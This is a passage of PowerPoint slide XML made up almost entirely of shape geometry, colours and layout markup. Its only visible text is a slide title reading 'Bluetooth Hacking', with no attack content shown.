                    <a:pt x="0" y="154"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="559" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154"/>
                  </a:ln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92" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A87894-D7B1-4B92-9795-4FC9B2135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315"/>
              <a:ext cx="100" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="10" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="42"/>
                    <a:pt x="42" y="33"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="9"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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93" name="Oval 292">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A855F82-E8F2-41A0-98A3-FF7F1FA52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0" y="315"/>
              <a:ext cx="100" cy="100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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94" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208796B5-5B59-44AC-AA21-906813C1A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315"/>
              <a:ext cx="99" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="9" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="42"/>
                    <a:pt x="42" y="33"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="10"/>
                    <a:pt x="32" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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95" name="Oval 294">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B73EFC-EAF1-4B68-B4CB-4005C5E69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6" y="318"/>
              <a:ext cx="99" cy="97"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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96" name="Oval 295">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C668517-DD59-4F69-AF36-D9C0AF1C9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5" y="443"/>
              <a:ext cx="100" cy="100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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34A55B77-655C-47C0-82A4-D8040B946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0" y="443"/>
              <a:ext cx="100" cy="100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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98" name="Freeform 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70886DDB-2551-4C09-BD6E-4E4434A63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443"/>
              <a:ext cx="99" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="10" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="42"/>
                    <a:pt x="42" y="33"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="10"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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99" name="Freeform 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C39B6E-3E49-4F7A-9C2F-1F1CD114D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446"/>
              <a:ext cx="99" cy="97"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 41"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 20 h 41"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9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1">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="10" y="41"/>
                    <a:pt x="21" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="41"/>
                    <a:pt x="42" y="32"/>
                    <a:pt x="42" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="9"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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300" name="Freeform 231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0AE0D6-08AD-444B-AE08-4C249CFF8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571"/>
              <a:ext cx="97" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 41"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 41"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 41 w 41"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 20 w 41"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 41"/>
                <a:gd name="T9" fmla="*/ 2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2">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="9" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="42"/>
                    <a:pt x="41" y="33"/>
                    <a:pt x="41" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="10"/>
                    <a:pt x="32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lose/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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301" name="Oval 300">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02148E4-80B6-4134-BDA9-91BE2A575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0" y="571"/>
              <a:ext cx="100" cy="100"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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302" name="Freeform 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A42D55-95CC-475D-8AF3-880C0BD03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574"/>
              <a:ext cx="99" cy="97"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 41"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 20 h 41"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9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1">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="10" y="41"/>
                    <a:pt x="21" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="41"/>
                    <a:pt x="42" y="32"/>
                    <a:pt x="42" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="9"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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303" name="Freeform 234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636BB9D9-6CE6-43FB-A3BA-7D4A345B2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574"/>
              <a:ext cx="97" cy="99"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 41"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 41"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 41 w 41"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 20 w 41"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 41"/>
                <a:gd name="T9" fmla="*/ 2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2">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="9" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="42"/>
                    <a:pt x="41" y="32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  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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304" name="Freeform 235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07F0E86-50F7-402A-9B0A-8CE553AED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699"/>
              <a:ext cx="99" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="9" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="42"/>
                    <a:pt x="42" y="33"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="10"/>
                    <a:pt x="32" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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305" name="Freeform 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F17D7A4-042B-4DB7-A9F1-107F63D28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702"/>
              <a:ext cx="100" cy="97"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 41"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 20 h 41"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9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1">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="9" y="41"/>
                    <a:pt x="21" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="41"/>
                    <a:pt x="42" y="32"/>
                    <a:pt x="42" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="9"/>
                    <a:pt x="32" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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306" name="Freeform 237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2EE777-D6C3-42FA-96DD-0C1FC19E5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702"/>
              <a:ext cx="99" cy="99"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="10" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="41"/>
                    <a:pt x="42" y="32"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="9"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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307" name="Freeform 238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36073596-F6D4-4BC0-B751-88C5F38DD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702"/>
              <a:ext cx="99" cy="99"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 42"/>
                <a:gd name="T1" fmla="*/ 21 h 42"/>
                <a:gd name="T2" fmla="*/ 21 w 42"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 42 w 42"/>
                <a:gd name="T5" fmla="*/ 21 h 42"/>
                <a:gd name="T6" fmla="*/ 21 w 42"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 42"/>
                <a:gd name="T9" fmla="*/ 2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0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="9" y="42"/>
                    <a:pt x="21" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="42"/>
                    <a:pt x="42" y="32"/>
                    <a:pt x="42" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="9"/>
                    <a:pt x="32" y="0"/>
                    <a:pt x="21" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F7F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308" name="Freeform 239">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84488EB4-CADF-499C-AC47-541F4302C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25"/>
              <a:ext cx="109" cy="43"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 46"/>
                <a:gd name="T1" fmla="*/ 10 h 18"/>
                <a:gd name="T2" fmla="*/ 7 w 46"/>
                <a:gd name="T3" fmla="*/ 18 h 18"/>
                <a:gd name="T4" fmla="*/ 38 w 46"/>
                <a:gd name="T5" fmla="*/ 18 h 18"/>
                <a:gd name="T6" fmla="*/ 46 w 46"/>
                <a:gd name="T7" fmla="*/ 10 h 18"/>
                <a:gd name="T8" fmla="*/ 46 w 46"/>
                <a:gd name="T9" fmla="*/ 7 h 18"/>
                <a:gd name="T10" fmla="*/ 38 w 46"/>
                <a:gd name="T11" fmla="*/ 0 h 18"/>
                <a:gd name="T12" fmla="*/ 7 w 46"/>
                <a:gd name="T13" fmla="*/ 0 h 18"/>
                <a:gd name="T14" fmla="*/ 0 w 46"/>
                <a:gd name="T15" fmla="*/ 8 h 18"/>
                <a:gd name="T16" fmla="*/ 0 w 46"/>
                <a:gd name="T17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8">
                  <a:moveTo>
                    <a:pt x="0" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14"/>
                    <a:pt x="3" y="18"/>
                    <a:pt x="7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43" y="18"/>
                    <a:pt x="46" y="14"/>
                    <a:pt x="46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3"/>
                    <a:pt x="43" y="0"/>
                    <a:pt x="3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8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00B69F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27347090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Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3112192"/>
            <a:ext cx="12192000" cy="3436092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="44546A">
              <a:lumMod val="75000"/>
              <a:alpha val="92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21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6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1253988" y="230539"/>
            <a:ext cx="968402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217"/>
            <a:r>
              <a:rPr lang="en-US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Bluetooth Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3313520" y="2591383"/>
            <a:ext cx="1028700" cy="1028700"/>
            <a:chOff x="6958880" y="3963566"/>
            <a:chExt cx="2057400" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6958880" y="3963566"/>
              <a:ext cx="2057400" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/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217"/>
              <a:endParaRPr lang="en-US" sz="36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43" name="Freeform 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7435931" y="4456398"/>
              <a:ext cx="1103298" cy="1112125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T1" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T2" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T4" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T6" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T8" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T10" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T11" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T12" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T13" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T14" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T15" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T16" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T17" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T18" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T19" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T20" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T21" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T22" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T23" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T24" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T25" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T26" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T27" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T28" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T29" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T30" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T31" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T32" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T33" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T34" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T35" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T36" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T37" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T38" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T39" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T40" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T41" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T42" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T43" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T44" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T45" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T46" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T47" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T48" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T49" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T50" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T51" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T52" fmla="*/ 0 w 58"/>
                <a:gd name="T53" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T54" fmla="*/ 0 w 58"/>
                <a:gd name="T55" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T56" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T57" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T58" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T59" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T60" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T61" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T62" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T63" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T64" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T65" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T66" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T67" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T68" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T69" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T70" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T71" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T72" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T73" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T74" fmla="*/ 2147483646 w 58"/>
                <a:gd name="T75" fmla="*/ 2147483646 h 58"/>
                <a:gd name="T76" fmla="*/ 2147483646 w 58"/>
